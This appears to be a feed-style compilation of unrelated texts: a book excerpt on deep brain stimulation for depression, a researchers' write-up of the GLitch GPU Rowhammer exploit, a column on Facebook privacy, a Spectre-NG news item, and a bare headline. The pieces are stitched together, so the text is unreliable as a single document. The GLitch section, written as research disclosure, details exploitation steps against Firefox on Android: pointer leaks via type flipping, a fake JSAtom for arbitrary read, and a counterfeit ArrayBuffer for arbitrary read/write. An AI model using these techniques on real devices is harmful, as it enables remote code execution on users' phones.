“It is clear that doctors are not obligated to set parameters beyond established therapeutic levels just because the patient wants it,” Synofzik and his two colleagues wrote in their article. After all, patients “don’t decide how to calibrate a heart pacemaker.”

That’s true, but there is a difference. Few laymen understand how to regulate heartbeat, but everyone is an expert on his or her own disposition. Why not allow patients to set their own moods to suit their own circumstances and desires?

Yeah, well, the three researchers reflected, it may well come to that—sometime in the future, that is—people will demand deep brain stimulation purely as a means for mental improvement.

They stressed that there is nothing necessarily unethical about raising your level of happiness this way. The problem is the lack of evidence that it is beneficial to the individual—particularly in light of the considerable cost of the treatment. Even before battery changes, which are needed every three to five years, and regular adjustments, we are talking $20,000 for the system itself and another $50,000 to $100,000 for the operation and hospital procedures.

Today, we have to ask ourselves where a “therapeutic level of happiness” might lie and whether there are risks and disadvantages connected with higher levels.

It seems the unknown young man with accumbens electrodes didn’t buy the argument because, after a short time, he stopped coming in for checkups and vanished without a trace. Maybe he found another doctor who was willing to make him happy.

Questions of pleasure and desire go right to the core of what being a human in the world is all about. The ability to stimulate selected functional circuits in the brain purposefully and precisely raises some fundamental questions for us.

What is happiness? What is a good life?

Hedonia. There is something about this word. It rolls across the tongue like walking on a red carpet and leaves a pleasant sensation behind. Hedonia might well have been the name of the Garden of Eden before the serpent made its malicious offer of wisdom and insight. And more than anything else, hedonism has become the watchword for how we should live.

The absence of joy and pleasure—anhedonia—has, in its way, become a popular issue in the wake of the disease depression. A quarter of us are affected by it over the course of a lifetime, various studies suggest, and its frequency is increasing in the industrialized world. The treatment of depression has become both a window display and a battleground for deep brain stimulation.

As soon as the electricity disappeared, the patient reported that her sense of springtime had vanished.

It was with the American neurologist Helen Mayberg and the Canadian surgeon Andres Lozano that the method got its breakthrough in psychiatry. It struck a sweet spot in the media when, in 2005, the two published the first study of deep brain stimulation for the treatment of severe chronic depression—the kind of depression, mind you, that does not respond to anything—not medicine, not combinations of medicine and psychotherapy, not electric shock. Yet suddenly, there were six patients on whom everyone had given up who got better.

At once, Helen Mayberg became a star and was introduced at conferences as “the woman who revived psychosurgery.” Later, others jumped on the bandwagon, and now they are fighting about exactly where in the brain depressed patients should be stimulated. It is not just a skirmish between large egos but a feud about what depression really is. Is it at its core a psychic pain or, rather, an inability to feel pleasure?

“It’s not my job as a neurologist to make people happy.”
 Helen Mayberg let her statement hang in the air between us before she continued.
“I liberate my patients from pain and counteract the progress of disease. I pull them up out of a hole and bring them from minus 10 to 0, but from there the responsibility is their own. They wake up to their own lives and to the question: Who am I?”

Helen Mayberg’s office spread out along the glass gable of a building at Emory University. Physically, there was something elfin about her with her brown pageboy hair, which rested on the edges of a large pair of spectacles. She was a striking, diminutive figure. But she loomed large as soon as she began to speak. Her voice was deep and intense, and she let her words flow in a gentle stream that forever meandered in different directions.

“We had a hypothesis, we set up an experiment, we laid out the data, and now we have a method that works for a great many patients.” She took a breath and lowered her voice half a tone. “But for me, it has always been about understanding depression.”

Helen MaybergEmory University School Of Medicine

Mayberg began her journey into the mechanisms of depression back in the 1980s—in a time when everything was all about biochemistry and transmitters. The brain was a chemical soup, and psychological symptoms were a question of “chemical imbalances.” Schizophrenia was an imbalance in the dopamine system, and the serotonin hypothesis for depression was predominant. It claimed that this oppressive illness must be due to low levels of serotonin. The hypothesis was supported by the fact that certain antidepression medications increased the level of serotonin in the brain, but the theory did not have much else to back it up.

Then something happened to change the focus. There was a breakthrough in scanning techniques, and this meant, among other things, that you could look at the activity in living brains and compare what happened inside people with different conditions. During the 1990s, Mayberg began hunting for the circuits and networks on which depression played. Others were working in the same direction, and different groups could point out that there was something wrong in the limbic system as well as the prefrontal cortex. That is, both the emotional and the cognitive regions of the brain were involved. MRI scans of people suffering from depression revealed that certain areas were too active while others were too sluggish in relation to the normal, non-depressed control subjects with whom they were compared.

Soon, Mayberg focused on a little area of the cerebral cortex with a gnarly name, the area subgenualis or Brodmann area 25. It is the size of the outermost joint of an index finger, located near the base of the brain almost exactly behind the eye sockets. Here, it is connected to not only other parts of the cortex but to areas all over the brain—specifically, parts of the reward system and of the limbic system. That system is a collection of structures surrounding the thalamus encompassing such major players as the amygdala and the hippocampus and often referred to as the “emotional brain.” All in all they are brain regions involved with our motivation, our experience of fear, our learning abilities and memory, libido, regulation of sleep, appetite—everything that is a affected when you are clinically depressed.

“Area twenty-five proved to be smaller in depressed patients,” Mayberg relates, adding that it also looked as though it were hyperactive. “At any rate, we could see that a treatment that worked for the depression also diminishes activity in area twenty-five.”

Desire pushes all the other systems and makes it possible to have motivated behavior and to work toward a goal.

At the same time, it was an area of the brain that we all activated when we thought of something sad, and the feeling that area 25 was a sort of “depression central” grew and grew as the studies multiplied. Mayberg was convinced that this must be the key—not just for understanding depression but also for treating those for whom nothing else worked. This small, tough core of patients who had not only fallen into a deep, black pit but were incapable of getting out again. These were the chronically ill for whom nothing helped, the kind of depressive patients who often wound up taking their own lives; it was this type of patient that, 50 years ago, were warehoused in state hospitals.

If only Mayberg could reach into their area 25!

And she could, with the help of a surgeon. Around the turn of the millennium, when she arrived at the University of Toronto, she met one of the institution’s big stars, Andres Lozano. He had not only done deep brain stimulation on several hundred Parkinson’s patients but was known as a researcher who was willing to take risks, who was eager to explore new territory. Here was something radical, and Lozano was more than intrigued. So it was simply a matter of recruiting patients. Over several months, the two partners spread the word, gave countless lectures to skeptical psychiatrists and, finally, began to get patients referred to them. One of them, a woman who had worked as a nurse before she became ill, was the first to sign up for the project. She had tried it all and did not expect an electrode to change anything. But why not give it a shot?

The operating theater was booked for May 13, 2003, and everything was made ready for the big test of Mayberg’s hypothesis as well as her scientific narcissism.

“I felt the schism between my own curiosity and the patient,” she said, holding both hands out from her body. “If something went wrong, it would be because I had asked a surgeon to do something on the basis of an idea.”

But the surgeon patted her on the back and said that she, Helen, knew more about depression than anyone on the planet. Lozano himself was not the least bit in doubt that he could place the electrode in their patient’s brain under very safe protocols.

“Ask yourself,” he said to me, “if this were your sister, would you do it?”

Mayberg would, and they went ahead. The operation itself went by the book. The patient was told that there were no particular expectations.

“Nobody knew what would happen. So the patient was instructed to tell me absolutely everything she observed. Whether it seemed relevant to her or not.”

The team began with their lowest-placed contact and 9 volts. Nothing happened. They turned up the voltage but still nothing happened. Then they went on to the next contact a half millimeter higher in the tissue. Even though they were only at 6 volts, the patient suddenly spoke. Were they doing something to her right then? she asked.

“Why do you think that? Tell me what you are feeling.”


“A sudden feeling of great, great calm.”


“What do you mean, calm?”

“It’s hard to describe, like describing the difference between a smile and laughter. I suddenly sensed a sort of lift. I feel lighter. Like when it’s been winter, and you have just had enough of the cold, and you go outside and discover the first little shoots and know that spring is finally coming.”

Then, the electrode was turned off. And as soon as the electricity disappeared, the patient reported that her sense of springtime had vanished.

Now, years later, Mayberg pulled up her knitted sleeve and held her forearm out to me. She still got goose bumps when she talked about that first time. And when I asked about how she felt there in the operating room, she did not hesitate to admit that she was close to tears.

“There was a purity to the moment.”

Later, it became clear that the reaction was not unique—other patients got the same “lift.” For one, it was as if a dust cloud around her had disappeared, while another suddenly felt there were more colors and more light in the room. Once they had experienced this immediate effect, there was a good chance that their depressive symptoms would decrease over the first months after the operation. But the lasting effect came gradually, and it had nothing to do with euphoria or happiness.

“The patients are aware I have not given them anything but have removed something that was bothering them,” said Mayberg. She liked analogies and offered me one. “It is like having one foot on the accelerator and one foot on the brake at the same time and, then, lifting your foot off the brake. Now, you can move.”

This was the core of the Emory group’s view of depression. They did not see it as a lack of anything positive—pleasure and joy—but as an active negative process. Neither did they believe you could just “inject positive” into a patient. Rather, you have to remove the constantly grinding negative activity.

When Mayberg’s landmark paper was published in Neuron in 2005 and she gave interviews to the major newspapers, the blogosphere exploded with indignant scribblings. Doctors had crossed the line! This was the return of the lobotomy!

“The conflict arises every time science reaches a new frontier. And as soon as research has anything to do with the brain, there are people who get nervous that it can be used for enhancement.”

That was my cue. I wanted to hear what Mayberg thought about joy, pleasure—hedonia. I know some groups treat depression by stimulating areas in the reward system and “injecting positive,” as she somewhat mockingly calls it. This applied, in particular, to a duo from the University of Bonn—psychiatrist Thomas Schläpfer and surgeon Volker Coenen, who virtually churn out studies reporting impressive results.

A certain tension appeared in the room. Mayberg stressed several times that Schläpfer was a “friend and a colleague,” but she also believed that he was in a strange competition with her. That it was as if he could not deal with the fact that she came first.

The treatment of depression has become both a window display and a battleground for deep brain stimulation.

“There may be plenty of people who suffer from anhedonia and who might get quite a lot out of having an electrode placed in their reward system. But if you don’t have psychological pain, I don’t believe it’s depression. If life just isn’t good enough, it won’t do anything for you to tone down area 25.”

Mayberg related the story of a patient to me. This woman had an alcohol problem in the past and, after she had her electrodes installed, she went home and waited for them to give her a sense of intoxication or euphoria. She was completely paralyzed by her expectations, and Mayberg had to explain that there was nothing to wait for. The procedure had simply awakened the lady to the realities of her life. The symptoms of her disease were diminished, but she herself had to put something in their place if she wanted to will her life.

“Our nervous system is set up to want more and to go beyond the boundaries we run into. You don’t want just one pair of shoes, right? I fundamentally believe that you go into people’s brains in order to repair something that is broken, but there is something strangely naïve about wanting to stimulate the brain’s reward system. Ask any expert on addiction. You will wind up with people who demand more and more current.”

I asked Schläpfer about the innermost nature of depression. What did he and Coenen think about Helen Mayberg’s ideas about psychological pain needing to be extinguished, as opposed to countering anhedonia?

The big man sighed, paused for a moment, and answered by way of an anecdote from when he was studying at Johns Hopkins in Baltimore. On one of the regular hospital rounds, the old head of psychiatry at the university pointed at him and asked him to name the symptoms of depression. The dutiful Swiss student stood up straight and began to recite the nine symptoms from the textbook, when the old man interrupted.

“No, no, young Schläpfer. There is only one symptom, and it has to do with pleasure. Ask the patient what gives him pleasure, and he will tell you: nothing.”

Young Schläpfer thought about his superior’s remark and actually began to ask his patients questions. He still does. Today, he believes that anhedonia is the central symptom while everything else, including psychological pain, is something that comes in addition to that. It is only when their anhedonia abates that people suffering from depression feel better. And this is not strange, because desire and enjoyment are driving engines and a key to many of our cognitive processes. Desire pushes, so to speak, all the other systems and even makes it possible to have motivated behavior and to work toward a goal.

“I am familiar with Helen’s attitude toward the reward system,” said Schläpfer with his slow diction. “But I would like to stress that we have never seen hypomania in the patients we stimulate in the medial forebrain bundle. If we overstimulate and turn the current up too high, the worst reaction we have seen is that people get a tingling sensation as if they’d had too much coffee.”

My curiosity was piqued by what Mayberg had said about the reward system and addiction. I dove into the literature and found an article from 1986, which described a case of dependence on deep brain stimulation. The journal Pain had a so-called case history of a middle-aged American woman. In order to relieve insufferable chronic pain, she had a single electrode placed in a part of her thalamus on the right side. She was also given a self-stimulator, which she could use when the pain was too bad. She could even regulate the parameters of the current. She quickly discovered that there was something erotic about the stimulation, and it turned out that it was really good when she turned it up almost to full power and continued to push on her little button again and again.

In fact, it felt so good that the woman ignored all other discomforts. Several times, she developed atrial fibrillations due to the exaggerated stimulation, and over the next two years for all intents and purposes her life went to the dogs. Her husband and children did not interest her at all, and she often ignored personal needs and hygiene in favor of whole days spent on electrical self-stimulation. Finally, her family pressured her to seek help. At the local hospital, they ascertained, among other things, that the woman had developed an open sore on the finger she always used to adjust the current.

When deep brain stimulation is no longer experimental but an approved standard treatment, anyone can take their stimulator and pay a visit to a doctor willing to set it right where they want it. Hypomania be damned.

Lone Frank is the author of two previous books in English, My Beautiful Genome and Mindfield (Oneworld, 2009). She has also been a presenter and coproducer of several TV documentaries and is currently working on a feature-length documentary about heath and deep brain stimulation. Before her career as a science writer, she earned a Ph.D. in neurobiology and worked in the U.S. biotech industry.

From the book: The Pleasure Shock by Lone Frank. Copyright © 2018 by Lone Frank. Published by arrangement with Dutton, a division of Penguin Random House, LLC.

GLitch: Rowhammer attack using the GPU

$
0
0

GLitch is one part of our series of Rowhammer attacks. We started by breaking the EDGE browser and the cloud. Then we moved towards Android devices showing how to root them with bit flips. This time we wanted to show that also mobile phones can be attacked remotely via the browser.
Meet GLitch: the first instance of a remote Rowhammer exploit on ARM Android devices. This makes it possible for an attacker who controls a malicious website to get remote code execution on a smartphone without relying on any software bug.
You want to know what makes this attack even cooler? It is carried out by the GPU. This is the first GPU-accelerated Rowhammer attack.

Wut? 🤔 How is it possible to trigger bit flips from the browser through the GPU?
The answer to this question is WebGL. WebGL is a graphic API that was designed with the purpose of providing developers with GPU acceleration for their graphics intensive applications. Unfortunately, as a byproduct of this API a new attack vector is introduced: the Grand Pwning Unit.

How does this sorcery work??
GLitch exploits a series of microarchitectural flaws of the system in order to leak and corrupt data.  The attack can be divided in two stages:

  1. In the first stage of the attack we take advantage of a timing side channel to gain a better understanding of the (physical) memory layout of the system.
  2. In the second stage we use the information extracted from the previous part to carry out a more reliable Rowhammer attack against the browser – in our case Firefox. For more details about the exploitation go down.

Ok! I got the gist of it… But then why from the GPU?
The reason is that Rowhammer requires uncached memory access. That is, it needs to bypass the processor caches to reach  DRAM.  While natively the attacker has more power and he is allowed to directly bypass the caches, this doesn’t apply to JavaScript. From JS this can be achieved only by means of cache evictions. And this technique was proven unfeasible on Android (ARM) platforms (check Drammer).  Therefore we needed a different attack vector. And here is where the GPU came into play. GPU caches were nicer and had deterministic behavior making it easier for us to build low-noise side channels and remote Rowhammer attacks.

FAQs

Sooo… Am I vulnerable to this exploit?
This question doesn’t have a yes or no answer. It depends on multiple factors. First of all your phone needs to be vulnerable to Rowhammer — very vulnerable since we need to implement eviction-based Rowhammer. If you’re unlucky and your DRAM cells are worse than a colander, then the other variable you need to take into account is the GPU architecture. Our PoC heavily relies on the insights we recovered by reverse engineering the architecture of our target systems: the Snapdragon 800 and 801. This means that our PoC works only on phones  such as the LG Nexus 5, HTC One M8 or LG G2.

Wait… You are making all this fuzz for phones that are 4 years old!?!? C’mon guys…
Well… Take it easy! First off we’re a university! We are not swimming in gold – feel free to donate your (old ) phone btw 🙃. Second, we implemented the attack on these phones cause we knew they were vulnerable to Rowhammer and we had multiple samples in the office to test against. You know… we still need to make scientific research somehow.
tl;dr  This doesn’t mean you’re not vulnerable. Different GPU architectures require different implementations of the attack which imply more reverse engineering effort. So we cannot tell you if your phone is vulnerable. We suspect it could be possible to port our attack on different architectures. But while on some of them may work even better on other may not work at all.

Ok… But I don’t use Firefox on Android (who does that anyway?) So no biggie!
Well some people actually use it (it has Adblock 😉). But this is a bit off topic…
Anyway, I have bad news again. The exploit serves only the purpose of a proof of concept. We wanted to show how we can get control over a phone remotely. But it has nothing to do with the core of the project:  microarchitectural attacks. So if you’re wondering if we can trigger bit flips on Chrome the answer is yes, we can. As a matter of fact most of our research was carried out on Chrome. We then switched to Firefox for the exploit just because we had prior knowledge of the platform and found more documentation (see credits).

If you’re interested in more details about the exploit or other techincal details we encourage you to read the paper or go down to the  technical walkthrough .

Demo

This demo shows GLitch in action on a LG Nexus 5 running Android 6.0.1. The video report an attack against Firefox 57. We extract the base address of libxul.so from procfs and we show how GLitch provides us with an arbitrary read/write primitive to leak such data.  The recording is taken from the Firefox Web Console — screen recording and GPU bit flips don’t get along that well   ¯\_(ツ)_/¯

Papers

[1] P. Frigo, C. Giuffrida, H. Bos, K. Razavi, Grand Pwning Unit: Accelerating Microarchitectural Attacks with the GPU, in: S&P, 2018.

Reception

We followed responsible disclosure and contacted the interested parties who acknowledge the issue. The vulnerability eventually got assigned CVE-2018-10229. The Dutch NCSC helped us throughout this (lengthy) process — thanks guys 🙃.

Current mitigations on the browser are tackling the timing channel introduced by the GPU.
Both Chrome and Firefox disabled the EXT_DISJOINT_TIMER_QUERY WebGL extension on the latest version of the browsers and redesigned (or are planning to in case of Firefox) the WebGLSync objects to avoid high precision timing as required by new WebGL specifications.

As of now there is no proposed mitigation to block the GPU-accelerated bit flips. Nonetheless, we’ve been directly discussing with Google (who has been very open during the disclosure process) possible options to solve the issue.

Technical details:

Here you can read more about the technicalities of the project. We first analyse the GPU and we then move forward to the exploit.

The Grand Pwning Unit

If you’re wondering how is it possible to program the GPU to trigger bit flips then you should read this.

The GPU  is a processor used to accelerate graphics rendering. The rendering pipeline consists of 2 main stages: geometry and rasterization. These stages are carried out by developer-provided programs called shaders. The vertex shader performs geometrical operations on vertices and the fragment shader fill the color of the pixels. These shaders are provided to the GPU at runtime. And this can be done also from JavaScript thanks to WebGL.

Let’s have a look at how the GPU aids the rendering pipeline. The CPU provides the GPU with vertices as inputs (Step 0). Then the GPU runs the vertex shader on every vertex (Step 1) producing polygons as outputs (Step 2). These polygons are composed of different fragments (≊pixels). Each of these fragments then gets  modified by the fragment shader (Step 3). The fragments usually get filled with colours extracted from textures . This process is known as texture sampling. [SPOILER]  textures are big and need to be stored in DRAM. The final step is to expose the outcome to the Framebuffer (Step 4).

Now we want to build a bug-free exploit. This means that we will rely simply on microarchitectural properties of the system. For this reason we need to share resources with the CPU who usually runs the sensitive “stuff”. As you may guess we can use texture sampling to gain access to DRAM, which is shared with the rest of the system. Even though we previously complained about the CPU caches also the GPU has caches. However, due to their deterministic behaviour they don’t pose much of a threat to our success and we are able to systematically bypass them. This means that through texture sampling we can access DRAM and can carry out the 2 stages of our attack.

The GLitch exploit

If you’re interested in the details of the exploit then you’re in the right place. Here we dive into the technicalities of the attack which, even if quite Firefox specific, are really interesting to understand how to compromise a device by relying on Rowhammer.
In this walkthrough however we will only describe the actual browser exploitation. We won’t dive into the details of the Flip Feng Shui technique used to get exploitable bit flips. But we DO explain which bits are actually exploitable. So let’s start from there. Let’s have a look to our main Rowhammer primitive: type flipping. 

Type flipping
S Exponent    Fraction
0 01111111111 01110000000000000000000000000000000000000000000000002 +20·(1 + 0.875)
1 11111111111 10001100010011000000011100000000000000000001111100002 NaN

The IEEE-754 specification stores double precision floats in 64 bits by using the exponential notation. That is, (-1)sign*(1.b{51}b{50}b{0})2*2(exp-1023)  where the MSB is the sign bit, the next 11 bits are the exponent and the final 52 bits are the mantissa as we show in the example above. The key concept behind type flipping is that the IEEE-754 specification treats any double having all the 11 exponent bits set to 1 (and the mantissa different from 0) as a peculiar value known as Not-a-Number (NaN). This means that all the 52 mantissa bits are completely useless for any mathematical computation when the exponent is set to all 1s. As a consequence, multiple JavaScript engines, among which SpiderMonkey (i.e., Firefox JS engine), have been using NaN in order to encode other values such as pointers in order to not waste these 252-1 unused values. SpiderMonkey uses two different encodings for this purpose depending on the architecture of the system: NuN-boxing for 32-bit systems and PuN-boxing for 64 bits. Since our attack targets 32-bit platforms let’s have a look at the NuN-boxing.

JSVAL_TAG_CLEAR  = 0xFFFFFF80,
JSVAL_TAG_INT32  = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, // 0x01
JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, // 0x06
JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT // 0x0c

1 11111111111 11111111111110000000000000000000000000000000000000002 //0xFFFFFF80

NuN-boxing uses the first 32 bits (one word) as a tag value to identify the type of the variable. Every tag smaller than JSVAL_TAG_CLEAR identifies a IEEE-754 double of 64 bits. Bigger tag values instead are used to identify object references. In this case the first word will contain details of the variable type, as represented in the snippet of /js/public/Value.h above . While the second word will contain the actual pointer.
Type flipping relies on the fact that any 1-to-0 bit flip in the first 25 bits of an IEEE-754 double can transform a pointer into a double while any 0-to-1 bit flip in the exponent bits can craft an arbitrary pointer. By exploiting this powerful property then we are able to gain two extremely powerful primitives, namely the ability to leak any pointer (arbitrary leak) and the ability to craft any pointer of our choosing (arbitrary craft).  For our attack, we will use both of them. This means that we actually need two bit flips. A 1-to-0 for arbitrary leak and a 0-to-1 for arbitrary craft.
We trigger these bit flips on normal JavaScript arrays’ slots. These in SpiderMonkey are internally known as ArrayObjects  and store data using the NuN-boxing technique. If we spray the memory with ArrayObjects we can simply fill them with marker values and then trigger the bit flips to identify the vulnerable slots. If arr[i] != MARKER after triggering the bit flip we have found our vulnerable slot.

Arbitrary read/write

We consider the attacker to be in possession of the two bit flips at two known locations within the ArrayObjects. Now we are only missing a JavaScript object that can be used to scan the memory. The obvious targets to obtain this primitive are ArrayBuffer objects.
ArrayBuffers allow an attacker to read (raw) binary data with byte granularity from memory. As a consequence we want to craft a fake ArrayBuffer which we can then reference (by using our arbitrary craft primitive).
The SpiderMonkey ArrayBufferObject class is represented as follows:

GCPtrObjectGroup group_;  // JSObject
GCPtrShape shape_;        // ShapedObject 
HeapSlots* slots_;        // NativeObject 
HeapSlots* elements_;     // NativeObject

// Slot offsets from ArrayBufferObject (two words each)
static const uint8_t DATA_SLOT = 0; 
static const uint8_t BYTE_LENGTH_SLOT = 1;
static const uint8_t FIRST_VIEW_SLOT = 2;
static const uint8_t FLAGS_SLOT = 3;

TheDATA_SLOT  field is what controls the memory referenced by the array buffer. Therefore, crafting a fake ArrayBufferObject header that we can then reference is the ultimate goal of our exploit. However, if we want to craft a fake object we are required to know the internal fields of the ArrayBuffer header (i.e., group_, shape_, …).
Therefore, we need to proceed in 3 steps:

  1. We need to leak a pointer in order to break ASLR.
  2. We need an arbitrary read to leak the unknown content.
  3. We neet to craft (and reference) our own fake ArrayBuffer.

So let’s go step by step.

1. Leak ASLR: Well this is pretty trivial. We simply store a reference of the object we want to leak in the 1-to-0 vulnerable slot of the ArrayObject. Then we trigger the bit flip, et voila. You got a used-to-be pointer that you can read as a double with a Float64Array. Now the question is what object do we want to leak. Again the answer is natural: ArrayBuffers. However, a specific type of ArrayBuffer which stores header and data inlined. Modern browsers in order to harden overflows exploitation have started allocating header and body of objects in different heaps so that an overflow doesn’t provide an attacker with control over the next object’s header. However, for performance reasons SpiderMonkey keeps header and data inlined for any ArrayBuffer with size smaller than 96 bytes. If we leak the pointer to an ArrayBuffer‘s header we can therefore derandomize also the location of its data (i.e, buff+sizeof(buff_header) whichis buff+0x30, as you can see from the snippet above). Knowledge of this relative offset makes it easier to craft our fake object.

2. Arbitrary Read: Now that we have derandomized the location of the ArrayBuffer‘s header we want to leak its header’s content. We do this by exploiting another extremely powerful JavaScript class: JSString. JSStrings are immutable, hence the read-only primitive. However, the UTF-16 standard provides us with an almost-arbitrary read. Firefox, defines different types of JSStrings. We exploit a sub class known as JSAtom. However, our only constraint is the non-inlined nature of the string.
Our fake JSAtom has the following structure:

class JSAtom: ... : JSString {
    struct Data {
         uint32_t    flags;     // 0x09 JSAtom
         uint32_t    length;    // sizeof(buff_header) 0x30
         char16_t*   string;    // *buff 
         } d;
}

We store the fake JSString at the beginning of the leaked ArrayBuffer. Which means it is located at address buff+0x30. Now we can craft a fake reference by building a fake double that after a 0-to-1 bit flip will reference an object of type String. This means we craft our double soon-to-be pointer as <0x???FFF86, buff+0x30> where the ??? depict the future 0xFFF. After the bit flip we can reference our fake JSString that points to the ArrayBuffer‘s header leaking its content.

3. Counterfeit ArrayBuffer: Now that we have the content of our ArrayBuffer‘s header we can craft our fake ArrayBuffer. We need to copy the 4 internal fields <group_,shape_,slots_,elements_> which are needed by the JS engine itself. Then we can set the DATA_SLOT field to any memory address mapped by the process and read/write at that location. That is, we have an arbitrary read/write. Now we can use this to gain control over the PC and gain remote code execution.

Credits (where credits is due):

The complete bibliography can be found on the paper but now we want to explicitly thank the authors of some very detailed walkthrough that helped us in developing the exploit.
The first person we want to thank is @argp for his awesome Phrack article which describes in details the internals of the SpiderMonkey JavaScript engine.
And second we want to thank the members of the Phonehex Team (in particular Samuel Groß) for their very thorough exploit walkthroughs.

Finally, on a separate note, we want to thank Rob Clark for his valuable inputs regarding the Adreno GPUs architecture.

Facebook says it really cares about your privacy this time, honest

$
0
0

Facebook’s annualF8 developer conference is supposed to be a showcase for all the cool new features the giant social network is either working on or busy rolling out to its two billion users—filters that turn your latest Instagram selfie into an animated picture of a dog, and so on. But not surprisingly, given all the furor over the Cambridge Analytica data leak and Mark Zuckerberg’s recent testimony before a Congress subcommittee, the latest iteration of the Facebook love-fest started on a somewhat different note.

In an attempt to lighten the mood, Zuckerberg tried to crack a joke when introducing a new feature that allows users to watch a movie or TV show with a friend and chat about it on the site. “Let’s say your friend is testifying before Congress and you want to watch,” the Facebook CEO joked awkwardly. On a more serious note, he suggested he has learned a few things about how the social network can be used for negative purposes. “I’ve learned this year that we need to take a broader view of our responsibility,” he said. “It’s not enough to just build powerful tools. We need to make sure that they are used for good.”

ICYMI: Mark Zuckerberg seems “genuinely peeved” during a recent interview

The Facebook CEO also announced a new feature that will enable users to block Facebook from tracking their behavior on the Web and through apps with Facebook access. It’s called “Clear History,” and operates much like a similar feature in most Web browsers: When clicked, it removes all of the data related to that user that is normally stored—data that is used by Facebook to help its algorithms figure out what you might be interested in, and which ads to show you (Zuckerberg pointed out that if you do enable this feature, “Facebook won’t be as good” until it gets to know you again).

Sign up for CJR's daily email

This and other new privacy-related features aren’t coming about because Facebook was raked over the coals in Congress, or because it is embarrassed by the Cambridge Analytica leak. One of the main driving forces behind the changes is the need to comply with the European General Data Protection Regulation, or GDPR, which comes into effect later this month. These rules require platforms like Google and Facebook to give users more control over who has their data and what they can do with it, or face significant financial penalties.

In his testimony before Congress, the Facebook CEO was asked whether he planned to extend GDPR-like protections to non-European users of the social network, and he hedged his answer, saying some of the details were still to be worked out. The “Clear History” feature appears to be part of his attempt to introduce enough protections to satisfy regulators without actually impacting Facebook’s business—in other words, a way to eat his cake and have it, too.

ICYMI: A newspaper with no online presence to speak of

Here are some more links related to Facebook’s ongoing struggles with privacy:

  • Baby, please don’t go: In a blog post published just before the F8 conference, Zuckerberg talked about the new “Clear History” feature and how it works. “When you clear your cookies in your browser, it can make parts of your experience worse,” he noted. “You may have to sign back in to every website, and you may have to reconfigure things. The same will be true here. Your Facebook won’t be as good.”
  • Gaming the system:Wired described in a recent piece how some critics believe both Google and Facebook are trying to implement the GDPR rules in a way that allows them to “game the system,” leaving users no better off than they were before. The supervisor of the EU’s data protection authority called the online platforms “digital sweat factories” whose approach to privacy is unsustainable, and said their proposals violate the spirit of the new regulations.
  • Power move: Some believe the new GDPR rules and other privacy-related regulations that emerged following the Cambridge Analytica leak could actually reinforce the power Facebook and Google have, since it will make it more difficult for other companies to acquire data or use it to build new services. That would effectively build a wall around the data Google and Facebook already possess, argues tech analyst Ben Thompson in an essay for his subscription newsletter Stratechery.
  • A data shell game: Facebook also appears to be restructuring itself behind the scenes in order to reduce its legal liability under the GDPR: It is moving the responsibility for data involving all non-EU users—who represent about 70 percent of the total, or about 1.5 billion—to its US subsidiary from its Irish subsidiary, meaning they will be governed by US laws on data protection, not the GDPR.

Other notable stories:

  • A group called the Student Press Coalition did a survey of student journalists at 49 Christian colleges and universities and found that more than 75 percent had faced pressure from university personnel to change, edit, or remove an article after it had been published in print or online. About 70 percent said their faculty advisors have the ability to stop a story from being printed.
  • According to a memo obtained by Variety, staffers at NBC were told by management that if they reported the sexual harassment accusations against veteran broadcaster Tom Brokaw, they had to also mention a letter of support for the former anchor. The letter was signed by more than 60 employees of the network, including prominent on-air personalities, and some staffers said they felt pressure to sign.
  • The fallout from the White House Correspondents Association dinner continues: The Hill, a site focused on stories about Washington politics, said it is pulling out of the event because it “casts our profession in a poor light,” and The New York Timessays CBS News also considered pulling out, but changed its mind after being assured that event organizers plan to switch up the format.
  • Speaking of the WHCA dinner, CJR’s Karen Ho dug into the finances of the event, and found that last year, the organization raised a total of almost $900,000 from ticket sales and donations for the event. About $550,000 of that went to pay for the venue and the entertainer, and only about $100,000 went toward the scholarships that the WHCA says are the main reason it does the dinner in the first place.
  • According to Ken Doctor at the Nieman Lab, hedge fund Alden Global Capital—which owns the Digital First Media newspaper chain—may be getting attacked for all the cuts it’s making at the papers it operates, but it isn’t likely to stop anytime soon because it has one of the highest profit margins.

ICYMI: One Alabama newspaper’s business model features a chair and a cigar box

Has America ever needed a media watchdog more than now? Help us by joining CJR today.
Mathew Ingram is CJR's chief digital writer. Previously, he was a senior writer with Fortune magazine. He has written about the intersection between media and technology since the earliest days of the commercial internet. His writing has been published in The Washington Post and the Financial Times as well as Reuters and Bloomberg.

Eight New Spectre Variant Vulnerabilities for Intel Discovered

$
0
0

News has just started spreading that researchers have sighted another eight Spectre like vulnerabilities in Intel processors, all resemble Spectre, four of them are critical. The new vulnerabilities are grouped and named as Spectre-ng. The newly discovered vulnerabilities would make it really easy to exploit a host from a simple VM.

German c't / Heise reports and breaks the news today, as the new vulnerabilities have not been made public just yet. There would be 'no doubt' that these are real vulnerabilities. While technical details are missing, the attack scenarios resemble close to what the Spectre vulnerabilities are. 

Currently, most at risk are shared hosting providers, once you have access to your rented server-container, you could exploit the processor to retrieve secure data. All eight vulnerabilities share the same design problem that the "Meltdown and Spectre" vulnerabilities detailed as well - they are, so to speak, Spectre Next Generation ergo Spectre NG. c't mentions they have concrete information about Intel's processors and their patch plans. However, there are some indications that other processors are affected as well, at least some ARM CPUs are also vulnerable to some extent. Further research into whether and to what extent the AMD processor architecture is vulnerable at (if at all), is not yet known.

Intel is reportedly actively and nervously working on Spectre NG patches behind the scenes; other patches are developed in collaboration with the operating system manufacturers (Microsoft / Linux etc). When exactly the first Spectre NG patches and firmware updates will become available is not yet clear. According to information, Intel is planning at least two patch waves: a first one should start in May; a second is currently scheduled for August. For at least one of the Specter NG patches is already a specific date as it was Google's Project Zero that has found one of the vulnerabilities, on May 7 - the day before the Windows Patchday - the 90-day warning period expires. So it's likely that when the first patch would be released for Microsoft Windows. Microsoft is preparing CPU patches: they appear to be in the form of optional Windows updates, and not so much microcode updated (firmware). The PC motherboard and server manufacturers probably need too long for BIOS updates. 

Intel classifies four of the Specter NG vulnerabilities as "high-risk"; which in Intel language is translated as: super dangerous. The danger of the other four is rated as medium. According to c't/Heise, Specter-NG risks and attack scenarios are similar to those of Specter - with one exception. C't calls the Intel vulnerabilities and their procs a Swiss Cheese due to the many security holes.


Click here to post a comment for this news story on the message forum.

The Unemployment Rate in Every Region of Europe

$
0
0

Submitted by Taps Coogan on the 3rd of May 2018 to The Sounding Line.

